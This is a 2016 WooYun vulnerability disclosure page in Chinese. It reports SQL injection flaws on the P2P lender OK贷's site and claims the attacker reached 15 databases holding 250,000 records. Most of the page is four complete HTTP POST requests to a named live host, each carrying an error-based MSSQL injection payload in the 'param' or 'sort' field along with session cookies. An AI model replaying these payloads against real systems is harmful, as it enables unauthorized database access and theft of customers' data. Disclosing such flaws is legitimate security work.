当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193363

漏洞标题:P2P金融安全之OK贷某站多处SQL注入漏洞&15个库&25万数据信息

相关厂商:OK贷网

漏洞作者: onpu

提交时间:2016-04-07 09:12

修复时间:2016-04-12 09:20

公开时间:2016-04-12 09:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-07: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

P2P金融安全之OK贷某站多处sql注入漏洞&&15个库&&25万数据信息

详细说明:

注入点一:

POST /Website/abouts/DeleteAboutsRemove HTTP/1.1
Content-Length: 180
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
param%5B0%5D=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(78)%2bCHAR(52)%2bCHAR(100)%2bCHAR(51)%2bCHAR(119)%2bCHAR(51)%2bCHAR(88))%20FROM%20syscolumns)


注入参数:param%5B0%5D
注入点二:

POST /Website/Feedback/GetFeedbackList HTTP/1.1
Content-Length: 197
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(74)%2bCHAR(115)%2bCHAR(55)%2bCHAR(81)%2bCHAR(55)%2bCHAR(52)%2bCHAR(87)%2bCHAR(50))%20FROM%20syscolumns)


注入参数:sort
注入点三:

POST /Website/Home/GetFriendDatas HTTP/1.1
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(118)%2bCHAR(74)%2bCHAR(50)%2bCHAR(51)%2bCHAR(81)%2bCHAR(88)%2bCHAR(84)%2bCHAR(111))%20FROM%20syscolumns)&StrKey=e


注入参数:sort
注入点四:

POST /Website/News/VidelListDetail HTTP/1.1
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(117)%2bCHAR(114)%2bCHAR(108)%2bCHAR(79)%2bCHAR(76)%2bCHAR(54)%2bCHAR(105)%2bCHAR(53))%20FROM%20syscolumns)


注入参数:sort

漏洞证明:

QQ图片20160407062403.png


QQ图片20160407062752.png


1.png

修复方案:

过滤

版权声明:转载请注明来源 onpu@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-12 09:20

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价